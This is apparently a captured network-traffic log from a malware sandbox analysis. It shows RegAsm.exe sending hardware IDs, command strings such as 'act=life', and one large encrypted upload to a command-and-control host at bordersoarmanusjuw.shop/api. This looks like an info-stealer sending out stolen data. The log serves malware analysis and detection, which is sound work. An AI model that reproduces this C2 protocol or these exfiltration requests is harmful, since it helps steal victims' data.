                                                                                                                                            2024-04-21 13:31:37 UTC7091OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:37 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:37 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=uh7nhh71jk1f34aj3t9aprhcgm; expires=Thu, 15-Aug-2024 07:18:16 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pBOWNxxhX7XmPMLnKd2Kau68I8R%2F8R%2BBb16%2BYb7jmhZdcnndau%2FYN7gXs2JjcKSp5WpjrXc28d9J6RletdzNszNVcvzed9KRYU%2FdV%2FTlTBagvWruljrbZ18eGziWZAOi%2F1W9KjGbHqWCGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc459fdb44e4-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            32192.168.2.449772172.67.189.664432128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:37 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1412
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:37 UTC1412OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:38 UTC814INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:38 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=2sg2vlsn0jeql5p53lq4eeblti; expires=Thu, 15-Aug-2024 07:18:17 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWCvfMpWCalHPuBx0%2FvwDm4FiJjz6EyLLFCwDzF2zUVbTnKooqvUIPlaPmp0x%2B73nA1AGQi8M7kf3X9yBcbo%2FDK8J3WoLpuctgWGZECiPwakr%2BWu5x67QuskmmxtLkNC2p1XLMsGp6WfQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc499e6eb077-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            33192.168.2.449773172.67.189.664432128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:38 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 584522
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: 26 3a e3 52 b8 55 3a 81 7a a0 c3 65 97 4b aa 7f 57 0f d7 38 70 6c ff 7b e4 20 c4 00 62 3a a7 43 3d 02 40 22 1c b6 99 87 18 c7 a4 c1 3e d8 3f 22 18 c3 fb 4b ae ce 9e 3e b6 0f b5 6e 16 c2 3e 21 08 6d e1 43 de 64 64 22 e0 1b aa 85 92 e0 fd 61 72 65 17 3f 88 d3 61 de 0f c3 10 f6 1b 57 d2 90 9a 56 20 74 1f c7 d5 91 31 b5 f6 40 0b 29 fd 38 98 21 9b a3 c6 ac 5a 47 0a d6 56 13 cf fc 6e b7 66 7f 75 92 09 0d 88 d5 a0 56 40 c7 f2 b9 81 4f 1b fb bb ab 3b cf cd d7 b8 7e ba f6 56 fc 7c 93 f6 5c 54 b5 dc ba fc 94 4e 48 fc 5e 83 91 bb f6 32 14 12 23 03 0d 8b ad a8 4d e5 2e 03 9f 7d d4 63 48 7f ae a3 ee 45 2e 6c e5 12 f5 d2 4c 82 4a 64 ad 20 d2 48 43 dd 97 c4 2f 9c 11 7d e7 b7 7a 4f ee f9 5a b7 24 85 1b 87 86 f4 62 4e ef a7 22 12 4a 82 bf 7c c9 de 2b 53 b4 c1 15 ca d9 4c
                                                                                                                                            Data Ascii: &:RU:zeKW8pl{ b:C=@">?"K>n>!mCdd"are?aWV t1@)8!ZGVnfuV@O;~V|\TNH^2#M.}cHE.lLJd HC/}zOZ$bN"J|+SL
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: be 26 1b fc f0 79 bc 31 8b c9 4d 8e 14 3a a6 db c7 10 df fe ec f5 bb 0a 84 e7 02 a3 9b ff c1 6b ef 58 2d d4 59 c3 6a 6a 52 a7 a3 e4 46 6a 63 c0 72 0a 95 f0 4b 6a 38 dd 38 40 fa 24 bc a1 1f 66 1c 4b f0 c2 90 50 0b c7 6f 35 47 6a cd 84 1f ea 30 86 fd db f4 a2 57 bf a1 a3 bd 7c b8 f6 95 68 4b ef 15 39 6d e5 2c 1d ec b3 8f 34 37 fc 2c 92 d4 cb 6f e3 c5 d7 96 7b 68 2b c3 cb 7c 7c 67 58 ff a5 85 39 37 d1 c7 1d 5c cf 92 d8 39 a3 91 92 a6 c3 01 cb 13 83 c5 c5 5b 9d 3f b3 05 0d 06 6e ff 39 25 e0 db b1 9c df 44 34 29 e9 24 bd 64 35 51 9d 63 b5 90 f9 9b 14 b3 fe 66 39 fe a5 1c 2a e2 51 69 52 aa 49 f4 c6 d9 b9 8f 3a 5c 06 dc 14 8b 6e fd 08 d2 b8 40 aa 47 68 42 ed 93 ab fc f3 fa 8a 1e bd 7a 23 dd 02 2e 7d 25 d2 0f 87 99 34 85 96 e0 50 2c 91 ae c7 5f 56 15 92 1e d4 e9
                                                                                                                                            Data Ascii: &y1M:kX-YjjRFjcrKj88@$fKPo5Gj0W|hK9m,47,o{h+||gX97\9[?n9%D4)$d5Qcf9*QiRI:\n@GhBz#.}%4P,_V
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: 3f c9 a3 12 73 f7 12 fe a7 45 82 a4 6e 97 b6 aa c6 49 90 57 68 1c 17 fd 48 a3 05 d3 6e e5 97 f0 97 43 52 55 1b bc 51 5d 15 31 62 e0 d7 89 2b 64 75 7c 1d fa 77 a2 3e f3 3b 20 78 af cb b7 43 9b de 39 cd 47 d8 9e ad a1 d1 3c bc a1 85 25 5c db 87 ae 58 26 58 a6 92 c5 48 8e d4 5c 5f db c1 68 b1 dd 65 82 00 ee 6d 80 0d 6c 89 a0 df 58 26 2e f1 ab 29 20 49 92 29 4e 41 f3 74 2f 80 69 d3 c3 1b 53 8b 68 f3 81 c1 b0 80 f7 8f 8e de f9 c1 3a 00 54 c2 cf 0a 01 54 53 56 dc cd 8a 06 e5 89 c7 df db 2e cc 6b 55 6e f4 41 a4 84 cd 1c 11 f8 7d 0b 3d 09 b8 91 f3 83 da 5a e1 9a 98 97 2e 6b cd b8 f2 ef 7f 41 8e 25 32 6d 7c 39 a4 c4 c2 ad a4 e7 66 87 ad 17 39 6a e1 52 e2 cb 5f 0f 85 92 00 9b c8 a8 61 cf cc 5c ad 48 78 14 ec 34 b9 eb 2f f9 68 b6 90 69 84 82 b2 25 14 be ad 96 71 ad
                                                                                                                                            Data Ascii: ?sEnIWhHnCRUQ]1b+du|w>; xC9G<%\X&XH\_hemlX&.) I)NAt/iSh:TTSV.kUnA}=Z.kA%2m|9f9jR_a\Hx4/hi%q
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: ce f7 8a 6b 6c c0 92 10 ec da 40 ea 51 ac 02 4d be 1b bd 7e f7 98 a9 0a f6 f7 ca c0 05 5e 8d 28 b2 05 29 c7 2e 94 cb 95 18 8e da 28 e1 89 32 af 64 6a 48 db 5d a0 e6 38 6a 90 b2 60 78 93 5d 8c 62 d1 9e c2 f8 61 59 8e 03 1b 31 df 5b ca 38 e5 68 ae 8f a6 9f e3 79 e1 53 f7 b1 f3 ec e5 61 f2 31 05 b2 0e bc 3f a2 31 5c b5 b9 c1 18 2f 87 cd 76 ed ce 2b aa 44 71 f3 ef 1c 3b b5 07 09 1b 6a 8f bb 97 67 20 77 27 54 74 49 79 df 6e 21 83 cd 9e 81 16 3d 8d 44 a3 82 5d 76 0a f2 c3 e4 24 ee 4e d1 c9 8c 3b fb df b7 3e 26 62 76 32 5d 8c e0 51 6c df 46 3e 55 30 5b 70 3b 36 d6 17 7e ed 24 3a d1 e8 f0 bc 75 76 53 58 20 23 6e 38 3b 10 25 cc aa a8 20 bd 39 e3 40 db ee 7d 28 80 f4 9d b3 1a 8c d1 69 cc ff 49 08 14 be f6 45 6f 8f a0 0c 12 dc 4f 7b 46 ba b7 71 90 a3 d0 ce c3 ea ec
                                                                                                                                            Data Ascii: kl@QM~^().(2djH]8j`x]baY1[8hySa1?1\/v+Dq;jg w'TtIyn!=D]v$N;>&bv2]QlF>U0[p;6~$:uvSX #n8;% 9@}(iIEoO{Fq
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: b6 ab 52 86 75 7d 03 d6 ad aa e0 bc 35 91 3e c2 6f 7a f6 0b a1 ff 01 ca 83 6f 5e 87 65 09 a5 9a 18 34 e3 0a 17 2c ed 42 a7 38 fc 45 bc bd 9a 3d bb 9a 4e 1c 4e 0a 8a 44 38 f1 a4 79 a3 96 2e 29 a6 fb b2 fe 92 4b 9c 33 6e e6 2e 6b 22 ae 9b a5 36 6f 2b 31 32 a6 e3 00 8e 81 fb 79 74 7a 0d c6 0e 12 f1 a3 3f b0 85 5b 53 26 ed 35 38 b3 60 c5 26 ae e9 ef 88 1a 86 55 70 24 fa 61 cf 6e 37 a5 da ea 4b c1 50 3e ac 4b fb f9 75 17 bb f7 e6 e0 63 97 37 6d db 59 a6 74 b7 97 1b f5 57 85 4b c0 a2 a6 18 18 7e d5 ac 28 a5 72 5e ed 75 cb e5 fd af bf 2a de 6e 66 9a 13 16 5a e1 6a 06 93 a5 65 81 19 ea 4c f5 7f 18 b0 d8 44 8a f5 03 eb 6b 22 be f2 bd db 01 85 f3 3f b4 5f b7 95 7e 39 e6 44 67 51 e1 87 6d 87 e3 4e 54 af a0 23 65 7f 14 31 99 78 d1 81 4a ff 2f 48 7f 9a 86 ac 76 4e 5c
                                                                                                                                            Data Ascii: Ru}5>ozo^e4,B8E=NND8y.)K3n.k"6o+12ytz?[S&58`&Up$an7KP>Kuc7mYtWK~(r^u*nfZjeLDk"?_~9DgQmNT#e1xJ/HvN\
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: 53 89 b7 8d c2 69 7a 5d 2d 66 e1 bc c2 e2 6b 8b 49 c5 e8 72 c3 7f 1d df ec 21 86 05 fc 55 c8 3a 83 eb c3 02 53 61 98 b7 40 2c 31 70 f5 e3 da 62 44 52 0e 3f de 15 dc 57 7b f8 aa 4c 68 f1 74 13 02 25 96 53 87 57 13 33 bc 08 5c d2 53 b5 b0 ae 06 52 b9 e4 fe 2f a7 6b 84 24 38 1c 43 69 9b c8 65 5a 20 70 df df cd 8c 26 7d 0b 90 ee ef 28 a5 c2 05 5a 3b b5 18 2c eb 2b a7 d4 1a 31 1d 5d 48 e7 11 af af ef 9a db 22 f8 6b 20 d9 72 2b 27 65 83 cb 7d 00 82 23 ff 98 fb a7 e8 c2 f6 8f 96 20 ad 9b 80 b2 da 69 7d 18 e4 6f 61 3d be 80 85 74 31 c0 d3 47 cd d3 02 c4 34 e5 dc 2e 18 ef 7a 6d af 76 99 5b db 79 5f f0 9a af 64 8d 21 18 ce a9 81 5a 0f b6 66 bf c4 9d 00 d8 06 cc 90 02 55 5e 0c 88 b0 17 ff 1e ea 03 40 e1 05 58 18 4b 3d 82 64 ac 1d 91 99 95 cc ef fa 00 00 bd 4b 19 88
                                                                                                                                            Data Ascii: Siz]-fkIr!U:Sa@,1pbDR?W{Lht%SW3\SR/k$8CieZ p&}(Z;,+1]H"k r+'e}# i}oa=t1G4.zmv[y_d!ZfU^@XK=dK
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: df 93 1a ad 6a 2f 90 49 59 9e f8 99 ea 28 3f 10 69 77 2d 3f 3d 0d 9d 33 8f 9f cb 54 23 8c 4b 63 11 5c a9 23 87 5e f4 d8 0f 84 1b 62 ec ba 3a 95 ac cb 9a dc 67 f4 32 33 4a 91 7d b2 fb ba 02 d3 69 7b 11 8c 52 b1 ae fb e5 3c 53 16 12 63 ea d2 cc 03 c6 6e 57 4a fd 67 5a bd 1a 5d 67 1f 1c aa e0 eb b6 81 f0 b8 ae 2f ae ff f0 20 b9 e0 21 d6 ce 59 fc 37 b2 a6 c5 c1 9b ce d3 cc 21 57 e2 d8 6c 5a f2 9c c2 b3 9e c0 55 2b 9b 5b 54 2c 25 f0 eb b5 a0 d9 bf bd 64 13 ea c5 2c a3 2b 10 b0 7b 18 39 97 f3 a5 9f 83 5f 9e 0d 96 ab 96 1a ea 53 59 67 2d 3f d3 55 18 52 0b 07 6d bc 40 5b 96 36 c3 c7 44 f1 2d e7 eb c1 6f c1 6f 7e d0 36 2f 2d 0c 1e 0d 81 58 3e a1 ed 6c 45 aa 2f 39 9d dc ab cb 89 bb f1 e5 ce ee 47 9c 0d 89 ec 4b 67 30 6b 57 9c e6 76 75 ce b8 97 b7 0f af ce 0e 33 ea
                                                                                                                                            Data Ascii: j/IY(?iw-?=3T#Kc\#^b:g23J}i{R<ScnWJgZ]g/ !Y7!WlZU+[T,%d,+{9_SYg-?URm@[6D-oo~6/-X>lE/9GKg0kWvu3
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: d9 8d ed 57 07 5e 7a 18 9d 92 74 4a a1 b3 a0 f5 ee 2d 1f 56 47 47 4f ad a3 40 0e 60 d7 3d ff e6 bd e2 3b 1f e1 c4 76 35 a6 8f fc 5a 7f 96 8b 34 d8 70 3f 02 48 2a c4 f6 3f 1b 59 bb ed dc 05 c4 05 10 b2 27 2f cf 9a fa 41 a5 77 b1 3e cf d2 a5 ef 38 58 65 38 67 1b 0b 0b c3 b6 a3 d5 51 21 97 bf d4 1c 96 52 a2 7b 71 4a 12 28 e8 68 43 1e 5e ec 82 69 6e 1b a3 51 98 c1 0e 91 c3 5e ac 49 c1 34 eb 17 5a 86 06 3d d3 e0 e4 50 6f 3c fb 57 a2 39 34 ec 0e 35 65 2a fb 04 df 6a 33 e0 d9 8e d6 9a 8a 6a 8a 51 b5 36 3a 62 b5 2f 10 dd 41 af 5f f3 5c 40 7a b0 21 f3 32 7c 5b ff d6 4f 62 02 4e c0 1b af 2a 7b d4 80 ef e9 bc 46 16 ba 52 33 11 e6 65 9b fa 4b da e6 55 b4 1b 8e f0 29 42 d2 97 1a f9 a9 cb cb 32 9f 88 d2 b8 49 65 b2 50 07 a0 18 f2 ca 04 92 89 17 48 42 94 fd 02 79 6f 6b
                                                                                                                                            Data Ascii: W^ztJ-VGGO@`=;v5Z4p?H*?Y'/Aw>8Xe8gQ!R{qJ(hC^inQ^I4Z=Po<W945e*j3jQ6:b/A_\@z!2|[ObN*{FR3eKU)B2IePHByok
                                                                                                                                            2024-04-21 13:31:38 UTC15331OUTData Raw: 79 72 84 b0 72 d8 61 ed 40 9a 6a cc ec c5 b2 c3 f3 ad 93 55 db ed 9e ee 8e 21 6d b9 ec bb ae af de 65 eb 26 07 6c 1f f0 92 9d 7c b6 10 b1 6a 3b 88 1a 31 48 38 77 46 ea 49 ee 42 fe 5b 43 ff 1a ce c1 0d 6d 0b bf 9e ec 32 86 32 61 3a 6e eb f7 d3 ef 56 1d f6 d6 b2 19 b9 29 ab 01 0f 85 55 25 c6 b4 65 c2 e1 9e 62 89 cf 22 e9 72 af 6a 10 81 94 80 bb 66 1a eb d1 c6 98 23 2b 1a 43 0c 0f b8 80 58 4a a4 1c 1f 4c 4e 8f a4 33 b7 9e ba 99 43 b0 60 b4 8e b2 3f f3 d1 26 62 f7 ac a5 a3 51 74 67 76 2f ca 4c fc bc 4f fb 79 3a 1d 4e ab af 4c f1 b4 37 f5 b0 8e d4 e6 c4 ee 18 e8 81 22 8f b0 1f 7b 78 f6 42 a7 29 87 74 96 07 82 58 bd d1 4c 03 99 0f 17 75 dd 1e 89 e7 33 62 5b 9c 69 88 10 df 35 db 68 c7 f1 c2 60 96 f0 2e 7c f2 56 e3 21 52 93 78 04 9d 15 a0 9c e1 98 cc 32 a5 b9 ca
                                                                                                                                            Data Ascii: yrra@jU!me&l|j;1H8wFIB[Cm22a:nV)U%eb"rjf#+CXJLN3C`?&bQtgv/LOy:NL7"{xB)tXLu3b[i5h`.|V!Rx2
                                                                                                                                            2024-04-21 13:31:40 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:40 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ktf3bokel4qgu9qtsit5hpke0e; expires=Thu, 15-Aug-2024 07:18:19 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2FeiLXcM8w1VXEwA8e25l5m10qQ1t%2BCTOb3nDeWFiGqgZ5XqYH2AQumijOGhIAL1XuF7h2LFe63Tk1aWlyaKmzo%2B9wfUdyNRhsQ%2FJKq90BdzYZ8zrhtjktT2jQRgHXOt4Kl%2FIY77sj%2F%2FaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc4fffa36734-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            34192.168.2.449774172.67.189.664435948C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:41 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:41 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-04-21 13:31:41 UTC818INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:41 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=msbsf3orbv1scsjfi3f85cnjda; expires=Thu, 15-Aug-2024 07:18:20 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IMlfQ476R%2BudrV2vG50zBq9ZZFn5PGbi0a7ISf1fI%2B95pd7Z24tvkR%2FU1TqUxK99FxtcQhObzY6kbGQh8mxr%2Br6zzD3d1TTZ1CtW8A0YWDWXeEL%2FQGSm%2BS7rfQk6cLoENhw3opP42PIiJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc611b4e7bdc-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:41 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-04-21 13:31:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            35192.168.2.449775172.67.189.664435948C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:42 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:42 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                                                                                                                            2024-04-21 13:31:42 UTC824INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:42 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=u7jdsppa9rgariauvsmugp279q; expires=Thu, 15-Aug-2024 07:18:21 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3h%2B2jD%2Fsg0Ci%2Fl3HYVj1uVPOPJ2ErVkAopB70EH7%2FUOBcRp2%2FoBfX4h69XvOTl%2F608ts%2FJU5RnDBdOTh12v9KVZuy7sKw%2F2wN4HOHi846sfcwqHpCthXDh%2BMbmD1hxOYDd1vcyHyuOKAXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc65ee16b094-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
